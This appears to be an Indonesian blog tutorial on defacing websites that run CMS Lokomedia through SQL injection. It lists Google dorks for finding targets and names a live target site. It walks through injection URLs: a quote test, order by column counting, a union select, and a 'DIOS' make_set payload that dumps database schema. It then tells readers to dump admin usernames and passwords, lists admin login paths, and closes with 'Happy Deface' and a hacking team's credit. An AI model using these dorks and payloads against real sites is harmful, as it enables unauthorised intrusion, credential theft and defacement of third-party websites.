Tutorial Sql Injection CMS Lokomedia

Assalamualaikum Wr.Wb ^_^
Pada Kesempatan Kali Ini Saya Akan Membahas Cara Deface Sql Injection Dengan Metode CMS Lokomedia:v

Ok Kita Langsung Ke Tutorial Nya aja ya hehe :v

Bahan:
-Muka Tamvan (Kaya Si Penulis)
-Rokok And Kopi (Sunah)
-Dork: (Wajib)
 inurl:/statis-1-profil.html
 inurl:/hal-tentang-kami.html
 inurl:/statis-3-strukturorganisasi.html
 inurl:hal-visi-misi.html
 inurl:hal-program--kegiatan.html
 inurl:hal-struktur-organisasi.html
 inurl:hal-kata-sambutan.html
 intext:copyright by inurl:statis-1 ext:html

 Kembangin Lagi ya Dork Nya Biar Dapet Yg Perawan Sesuai Otak Vokep Kalian :v

Ok Mode Serius Gan :v

Pilih Salah Satu Web Yg Ingin Kalian Begal :D
Disini Saya Memenggunakan Live Target Web:
http://jokowipresidenku.org/berita-jokowi-ingin-ibu-kota-di-luar-jawa-sri-mulyani-soal-menkeu-sby--jokowi.html

Tinggal kasih string nya ' ya contoh:

http://jokowipresidenku.org/berita-jokowi-ingin-ibu-kota-di-luar-jawa-sri-mulyani-soal-menkeu-sby--jokowi'.html

Kalo Vuln Akan Seperti Gambar Ini ^_^

Nah Vuln guys Itu Artinya Web Nya Bisa Kita Entot :v Kita Lanjut Ke Order by Contoh:

http://jokowipresidenku.org/berita-jokowi-ingin-ibu-kota-di-luar-jawa-sri-mulyani-soal-menkeu-sby--jokowi'+order+by+1--+.html

Kita Cari Eror Nya Di Angka Berapa, Disini Eror Nya di Angka 37 jadi Colum Nya Ada 36 ya :v

Nah Tinggal Kita Union Select Aja, Caranya? Contoh:

http://jokowipresidenku.org/berita-jokowi-ingin-ibu-kota-di-luar-jawa-sri-mulyani-soal-menkeu-sby--jokowi-'and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--%20-.html

Kita Pakai -'and+0+union+select dan Boom

Dapet Deh Angka Togel Nya :v Sekarang Tinggal Kita Tempel Dios Nya Di Angka Togel Seperti Ini: /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)

Tinggal tempel Di Angka Togel Contoh:

http://jokowipresidenku.org/berita-jokowi-ingin-ibu-kota-di-luar-jawa-sri-mulyani-soal-menkeu-sby--jokowi-'and+0+union+select+1,2,3,4,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--%20-.html

Dan Boom :v Alay Dikit Gpp kali eaa :v

Nah:v Tinggal Kita Dump User Pw nya:v 

Kalo Dah Dapet Tinggal Ke Halaman Login Eaa 

 -site.com/admin

 -site.com/adminweb

 -site.com /redaktur
 -site.com/administrator

 -site.com/admin.php

Atau Kalian Bisa Scan Aja Menggunakan Admin Finder ok ^_^

Ok Cukup Sampe Sini Tutorial Nya Semoga Bermanfaat Untuk Kalian:v 

Jangan Lupa Di Share ya :v 

Kalo Mau Pepes Saya nitip nick :v Mr.Ch4m0nk Dan Nama Team nya Juga Garuda Tersakti 72

Happy Deface ^_^ Enjoy :v

Bagikan Artikel ini